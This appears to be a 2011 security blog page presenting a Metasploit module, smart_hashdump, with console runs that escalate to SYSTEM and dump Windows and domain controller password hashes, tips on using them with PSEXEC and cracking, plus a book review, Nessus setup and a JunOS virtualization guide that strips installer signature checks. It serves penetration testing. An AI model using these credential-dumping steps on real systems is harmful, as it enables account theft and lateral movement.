Shell is only the Beginning

A couple of months ago I was asked by the NWN guys from the pentest team to help them automate dumping windows hashes depending on the role and privilege level, for them I wrote hashdump2 a Meterpreter Script to automate what back then was required. Mubix this week wrote a blog post on his experience and process for when dumping hashes on x64 systems, specially Windows 2008 R2 Domain Controllers. I re-wrote the hashdump2 script and added the logic that Mubix came up with plus added the ability to escalate privileges using the getsystem API call and reworked the logic of the script and ported the result to a post module both called smart_hashdump. The way the module and script works is as follows

• It first checks the Privilege Level and OS.
• It will check if the target is a Domain Controller.
• Based on this information it will prefer the reading of the registry to get the hashes if possible, if not possible it will inject in to the lsass process if possible. For Domain Controllers it will use the injection to lsass.
• If the target is a Windows 2008 server and the process is running with admin privileges it will attempt to get system privilege using getsystem, if it gets SYSTEM privilege do to the way the token privileges are set it can still not inject in to the lsass process so the code will migrate to a process already running as SYSTEM and then inject in to the lsass process.
• If the code detects that it is running on a Windows 7/Vista box with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.
• On Windows 2003/2000/XP it will use getsystem and if successful it will use the read registry method.

Script:

meterpreter > run smart_hasdump -h
Meterpreter Script for automating the dumping of local accounts from
the SAM Database and if the targets host is a Domain Controller the
Domain Account Database using the proper technique depending on 
privilage level, OS and Role of host.
OPTIONS:
    -h        Help menu.
    -l <opt>  Log folder to save results, if none provided default log path will be used.
    -s <opt>  Try to get SYSTEM Privilege

Module:

msf exploit(handler) > use post/windows/gather/smart_hashdump 
msf post(smart_hashdump) > info
       Name: Windows Gather Local and Domain Controler Account Password Hashes
     Module: post/windows/gather/smart_hashdump
    Version: $Revision$
   Platform: Windows
       Arch: 
       Rank: Normal
Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>
Description:
  This will dump local accounts from the SAM Database and if the 
  targets host is a Domain Controller the Domain Account Database 
  using the proper technique depending on privilage level, OS and Role 
  of host.
msf post(smart_hashdump) > show options 
Module options (post/windows/gather/smart_hashdump):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   GETSYSTEM  false            no        Attempt to get SYSTEM Privilege on the target host.
   SESSION                     yes       The session to run this module on.

Both use the same calls and print almost the same messages so lets use the post module since it is what most of the code is moving to, first lets run it on a Windows 2008 R2 DC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN2K8R2-01
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518200416_default_192.168.1.234_windows.hashes_483699.txt
[+]     This host is a Domain Controller!
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*] Migrating to process owned by SYSTEM
[*] Migrating to wininit.exe
[+] Successfully migrated to wininit.exe
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552:::
[+]     krbtgtB:502:aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2:::
[+]     testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     WIN2K8R2-01$?:1006:aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f:::

On a Windows 7 System with UAC Disabled as Administrator:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201100_default_192.168.1.224_windows.hashes_711181.txt
[*] Dumping password hashes...
[-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes
[-] Try setting GETSYSTEM to true.
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201122_default_192.168.1.224_windows.hashes_541308.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 35f17065cf29faf142844a684d502ba8...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::

on a Windows 7 System as Administrator with UAC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN-KVJG16GEMOJ
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201439_default_192.168.1.112_windows.hashes_452083.txt
[-] Insufficient privileges to dump hashes!

Sadly UAC does a good job at blocking dumping the hashes even as Administrator, it will even block getsystem.

on a Windows XP System:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201750_default_192.168.1.113_windows.hashes_761609.txt
[*] Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0":1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201818_default_192.168.1.113_windows.hashes_177417.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::

On XP and Windows 2003 if you are an administrator you can dump hashes with no problem and getsystem will yield success.

To get a list of all the accounts and hashes from the main console:

msf exploit(handler) > db_creds 
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=WIN2K8R2-01$? pass=aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=testuser  pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=krbtgtB pass=aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=adminuser pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=HelpAssistant pass=17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=SUPPORT_388945a0 pass=aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63 active=true
[*] Found 9 credentials

.

If you are going to use those hashes in PSEXEC and for cracking remember to filter the Guest, SUPPORT_* and HelpAssistant accounts since typically they are disabled. On the Domain Controller the account with the hostname$ is the Active Directory Recovery Account many time the same as the Domain Admin Account and it can not be used remotely.

I included the creation of a loot file with the hashes for 2 reasons

1. It saves the SID of the account so as to identify the accounts and be able to use those if needed.
2. Some times you do not have a Database attached or delete a workspace by accident.
   

Script Download

Module Download

Kingpin is the story of Max Vision from his teen years to when he got arrested and sentenced as the top carder in the underground and how he used his hacking skills from good to bad and his constant attempts to do the right thing and kept being pulled back to the world of a black hat. The book covers from his youthful pranks, his forays in to hacking and being one of the top white hats in the industry, while the industry was young and booming during the dot com era. Max made several bad decision do his temper and lack of control, in addition the intellectual addiction that hacking produces, the rush of euphoria that causes the act of one being pitted against another, the challenge of bypassing defenses and being a shadow undetected and powerful inside a system caused him to delve deeper on the wrong side of the law, not to mention the amount of money he was making and his believes that in some part he was doing good and only harming the big companies. He used that energy and passion to become the master of one of the most powerful carder forums out there. The book also covers the early history of the security industry its players, covering the small band of programmers and technologist that started many of the security companies that change the landscape. Max being one of the contributors to the beginnings of projects like Snort the Opens Source IDS and the sharing of knowledge that formed the beginnings of the industry. The book also covers the side of the law enforcement agencies and officers that participated in the cat and mouse game against the different crime organizations. It shows how law enforcement had to adapt to the ever-changing landscape of then Internet and how it changed the rules of the game. Also we see how the paths of many of the prominent figures involved in attacks intermingled in the small community of the carder underground, where many of those that where committing the crimes also at one time or another also worked with law enforcement as informants and helped in operations, voluntarily or under threat of jail. My favorite part is on the hacking techniques used by this brilliant people, how they adapted and hid form law enforcement and the mistakes made that lead to their discovery and arrest. One of the areas of interest is how some of the people involved targeted law enforcement with success to gain information of their operations against them. I do believe that nobody could have brought this story to life in this way than Poulsen did, in great part do to his history as a hacker, knowing what motivates and drives the mentality of one and his experiences as a man on the run from the law. His career as a journalist for wired magazine provided the skills for him to transmit in a way that it is easy to grasp all the technical concepts in the book, taking the reader from scene to scene as played by each of the different players of the story and bring each one of those stories together and showing how the are all intertwined together.

One of my favorite tools in my toolbox is the Vulnerability Scanner Nessus, in part because of it’s accuracy and because I’m part of one of the teams that works adding new cool stuff to it during the day. So I was super happy to see it included as part of Backtrack. Ever since I started working professionally in security Nessus has been part of my toolkit, once nessuscmd was out it became more integral in to my workflow because I could automate stuff for my customers. Before I had to always follow some weird procedures some times to get Nessus installed on the early versions of Backtrack and those procedures where always prone to breaking when I had to update to a latest version. I would like to share how to activate your copy of Nessus in Backtrack and some of the caveats that are present when activating it depending of your setup. The first step is to have Bactrack installed as a virtual machine on your pentest/audit rig or installed locally on the hard drive of the machine. Do not try to activate by running it from the bootable DVD or from a USB Drive if you intend of using it on several physical machines because the registration process marries the activation to that specific host. So moving the VM from one host to another or the USB drive depending on how you configured Backtrack is more than likely to require re-activation of your copy of Nessus. So one of the first thing you need to do if using a professional feed go to http://support.tenable.com and log in and go in to Manage Activation Codes and get your professional feed activation code. If you will be using a Home Feed you will have to go to http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code and register for a Home Feed, you will receive your activation code to the email you provided. Once you have the activation code you can proceed to activate it on your Backtrack Machine running as root:

root@bt:~# /opt/nessus/bin/nessus-fetch --register M4D0-EWWQ-1EZU-3KSN
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

And yes the activation code in the example if a fake one for demonstration purposes only.

The next step is to add an admin user on this box so it can connect, create profiles, policies and launch scans:

root@bt:~# /opt/nessus/sbin/nessus-adduser
Login : carlos
Login password : 
Login password (again) : 
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that carlos has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done : 
(the user can have an empty rules set)
Login             : carlos
Password         : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y] 
User added

Once the user has been created we can launch the Nessusd Daemon:

root@bt:~# /etc/init.d/nessusd start
Starting Nessus : .

Do keep in mind that since this is the first time you will be running the daemon it will take a while for it to load and configure all the checks. You can run top on the system and use the capital P to sort by CPU and then the capital R to change the order if needed, you will see that while loading nessusd will take close to 100% of you CPU and when finished it will normalize. Once it does you just need to connect with your web browser to https://localhost:8834/ or if connecting remotely the IP of the machine instead of localhost. Make sure that NoScript is set to allow script from localhost or the machines address depending your case.

Many times when working with a client network or working on our own we have the need to test, document and validate certain networks configurations in a test environment. Sadly not many have the money to have one so as to test different scenarios so as to gage the impact that this changes might have on the production network. For a majority of configuration when it comes to system settings and routing a virtualized environment can be of great help, sadly anything ASIC or HW Specific configurations. On this blog post I will cover how to virtualize JunOS operating system to aide with testing and validating. I did this for a friend who needed to migrate the configuration of several of his Juniper Routers to a newer version of the OS and Hardware and also asked me for recommendations for hardening the routers. I do have to say I really like JunOS specially since it is a full FreeBSD subsystem underneath to wish a user has access to.

Requirements

 

Software required to install JunOS on VMware:

• Download FreeBSD 4.11 mini ISO from FreeBSD ftp site Link
• M Series Router jinstall Domestic Signed tgz file, Export version does not provide SSH.
• Jweb tgz file for the version of JunOS being install

NOTE: Do not ask for Juniper images I will ignore those messages. You need a valid contract to obtain them.

Settings for Workstation 7.x

• On VMware Workstation:
• Create a New Virtual Machine.
• Select on the image the FreeBSD ISO image.
• Ensure that FreeBSD is selected as the operating system type.
• Make sure HDD is 4GB or higher and of type IDE for version 9.x and 10.x for version 11.x use 6GB or higher.
• For memory set initially 512MB for 9.x and after installation of jweb it can be changed to 256MB, for 10.x and 11.x set initial value to 1024MB and after install 512MB.
• After creation of VM and before installation open VMX file and sure that the SCSI devises presence settings be set to FALSE: scsi0.present = "FALSE"
  

Settings for VMWare ESX 4.x

On VMWare ESX and ESXi :

• Create a New Virtual Machine with Operating System Other -> FreeBSD 32-bits
• Make sure HDD is 4GB or higher and of type IDE for version 9.x and 10.x for version 11.x use 6GB or higher.
• "Select the Edit Virtual Machine Settings Before Completion" Check Box.
• Change the SCSI Controller to LSI Logic SAS
• For memory set initially 512MB for 9.x and after installation of jweb it can be changed to 256MB, for 10.x and 11.x set initial value to 1024MB and after install 512MB.
• Set in the CD Rom the FreeBSD 4.11 ISO and make sure that it is Connected before saving.

FreeBSD Installation

• Skip the kernel configuration and choose the standard installation.
• When prompted to use fdisk select OK.
• When you get to partitioning, allocate first the whole disk to BSD.
• Press c then OK for the other prompts and finish by selecting q.
• Select BootMrg as the boot manager.
• Create the disk slices as shown in the table below:

Slice	Name	Size
ad0s1a	/	2000M
ad0s1b	Swap	1024M
ad0s1e	/config	64M
ad0s1f	/var	Remaining Space

• / has to be a reasonable size or else you'll run out of space on /mnt.
• Choose 'Minimal' installation type and skip installing ports.
• After the base is installed it will ask you if you want to configure Ethernet settings, select yes and use DHCP to configure your NIC (em0), Write down the IP given by DHCP and set a Hostname for the server. This allow us to scp the jinstall file after reboot.
• Except for the DHCP on interface em0, choose "no" for everything else (IPv6. Linux compatibility, NFS, FTP, Inetd, TimeZone etc..)
• When asked to create a user create one called junos, set a password for it and add it to the group wheel. Ensure to put a password for the root account.
• After the installer completes it will reboot. Make sure that you have disconnected the CD so as to make sure the VM will not boot in to the CD again.
• scp to /var/tmp on the VM the jinstall file only, do not copy the jweb file yet since during installation the file system will be formatted and changed.

 $ scp jinstall-<version>-domestic-signed.tgz junos@<ip>:/var/tmp

• Once the file is there yo will SSH in to the server and use the su command to gain root privileges:

  $ su -

JunOS 9.6R1

Unpack the different parts of the installer and remove hash files used to validate the installer:

# cd /var/tmp/
# mkdir jinst
# cd jinst
# tar xvzf ../jinstall-9.6R1.13-domestic-signed.tgz
# rm *.md5 *.sha1 *.sig
# mkdir domestic
# cd domestic/
# tar xvzf ../jinstall-9.6R1.13-domestic.tgz
# mkdir pkgtools
# cd pkgtools
# ls
# tar xvzf ../pkgtools.tgz
 

Make sure that check for hardware always return true by replacing the checkpic command:

# cp /usr/bin/true bin/checkpic

Repackage the installer:

# tar cvzf ../pkgtools.tgz *
# cd ..
# rm -rf pkgtools
# tar cvzf ../jinstall-9.6R1.13-domestic.tgz *
# cd ..
# rm -rf domestic/
# cd jinst
# tar cvzf ../jinstall-9.6R1.13-domestic-signed.tgz *
# cd ..
# rm -rf jinst/

Install the package using pkg_add:

# pkg_add jinstall-9.6R1.13-domestic-signed.tgz
Adding jinstall...
sysctl: unknown oid 'hw.product.model'
sysctl: unknown oid 'hw.re.model'
sysctl: unknown oid 'hw.re.model'
sysctl: unknown oid 'hw.re.model'
WARNING:     This package will load JUNOS 9.6R1.13 software.
WARNING:     It will save JUNOS configuration files, and SSH keys
WARNING:     (if configured), but erase all other files and information
WARNING:     stored on this machine.  It will attempt to preserve dumps
WARNING:     and log files, but this can not be guaranteed.  This is the
WARNING:     pre-installation stage and all the software is loaded when
WARNING:     you reboot the system.
Saving the config files ...
Installing the bootstrap installer ...
WARNING:     A REBOOT IS REQUIRED TO LOAD THIS SOFTWARE CORRECTLY. Use the
WARNING:     'request system reboot' command when software installation is
WARNING:     complete. To abort the installation, do not reboot your system,
WARNING:     instead use the 'request system software delete jinstall'
WARNING:     command as soon as this operation completes.

DO NOT REBOOT, Ensure you can interact with JunOS on the VM Console:

# chmod +w /boot/loader.conf
# vi /boot/loader.conf

Add this line to the file:

console="vidconsole"

Reboot the device by entering the reboot command, the installation process will take several minutes and the router will reboot twice.

 

JunOS 10.4R1 and JunOS 11.1R1

This process is the same for 10.x and 11.x. Unpack the different parts of the installer and remove hash files used to validate the installer:

# cd /var/tmp/
# mkdir jinst
# cd jinst
# tar xvzf ../jinstall-9.6R1.13-domestic-signed.tgz
# rm *.md5 *.sha1 *.sig

Open in vi the +INSTALL file

# vi ./+INSTALL

Modify the variable re_name in the check_arch_compatibility() function as shown bellow, inside vi you can do a :/check_arch<enter> to go directly to it.

check_arch_compatibility()
{
    #re_name=`/sbin/sysctl -n hw.re.name 2>/dev/null`
    re_name='olive'
    if [ -z "$re_name" ]; then
        Error "hw.re.name sysctl not supported."
    fi

Continue unpacking the next level of the package:

# mkdir domestic
# cd domestic/
# tar xvzf ../jinstall-10.4R1.9-domestic.tgz

Open with vi +INSTALL and +REQUIRE and modify the variable re_name in the check_arch_compatibility() as done before. Unpack the pkgtools.tgz file and make the checkpic file always return true:

# mkdir pkgtools
# cd pkgtools
# tar xvzf ../pkgtools.tgz 
# cp /usr/bin/true bin/checkpic 

Repackage the installer:

# tar cvzf ../pkgtools.tgz *
# cd ..
# rm -rf pkgtools
# tar cvzf ../jinstall-10.4R1.9-domestic.tgz *
# cd ..
# rm -rf domestic
# tar cvzf ../jinstall-10.4R1.9-domestic-signed.tgz *
# cd ..
# rm -rf jinst

Install the package:

 # pkg_add jinstall-10.4R1.9-domestic-signed.tgz 
 Adding jinstall...
 sysctl: unknown oid 'hw.product.model'
 sysctl: unknown oid 'hw.re.model'
 sysctl: unknown oid 'hw.re.model'
 sysctl: unknown oid 'hw.re.model'
 WARNING:     This package will load JUNOS 10.4R1.9 software.
 WARNING:     It will save JUNOS configuration files, and SSH keys
 WARNING:     (if configured), but erase all other files and information
 WARNING:     stored on this machine.  It will attempt to preserve dumps
 WARNING:     and log files, but this can not be guaranteed.  This is the
 WARNING:     pre-installation stage and all the software is loaded when
 WARNING:     you reboot the system.
 Saving the config files ...
 Installing the bootstrap installer ...
 WARNING:     A REBOOT IS REQUIRED TO LOAD THIS SOFTWARE CORRECTLY. Use the
 WARNING:     'request system reboot' command when software installation is
 WARNING:     complete. To abort the installation, do not reboot your system,
 WARNING:     instead use the 'request system software delete jinstall'
 WARNING:     command as soon as this operation completes.

Ensure you can interact with JunOS on the VM Console, there is no need for this step with version 10.4 but recommended in case there is a change in any other 10.x package:

# chmod +w /boot/loader.conf
# vi /boot/loader.conf

Add this line to the file:

console="vidconsole"

Reboot the device by entering the reboot command, the installation process will take several minutes and the router will reboot twice.

Initial Configuration

On the console at login enter root and enter on the password prompt. Enter cli to enter in to command line interface of JunOS and enter:

% cli
> configure

Set the hostname for the router:

# set system host-name <router name>

Set the root password:

# set system root-authentication plain-text-password <enter>

Create a secondary admin user to use for SSH:

# set system login user <username> class super-user
# set system login user <username> authentication plain-text-password <enter>

Set an IP Address on the interface em0 so as to connect to the router:

# set interfaces em0 unit 0 family inet address <ip/mask>

Enable and set the SSH Version of the protocol to use to version 2:

# set system services ssh protocol-version v2

Enable Telnet:

# set system services telnet

Enable FTPD:

# set system services ftp

Set the default gateway:

# set routing-options static route 0.0.0.0/0 next-hop <Default Gateway IP>

Set the DNS Server to use:

# set system name-server <name server IP>

Save the configuration:

# commit

To get full list of software installed and version without paging:

> show version | no-more

To get full configuration:

> show configuration | no-more 

To get full configuration in XML format:

> show configuration | no-more | display xml

Install the Web Interface

Copy to the router the jweb file using scp and the secondary admin account created above:

> show configuration | no-more | display xml

SSH in to the router and run:

> request system software add /var/tmp/jweb-<version>-signed.tgz

After installer finishes execute a reboot of the router

> request system reboot 
Reboot the system ? [yes,no] (no) yes

It will take a while for the router to reboot since it is setting up the files for the web interface. Once the router is back up connect to it, enter configuration mode and enable the the web management system on the interface you configured:

# set system services web-management http interface em0.0
# commit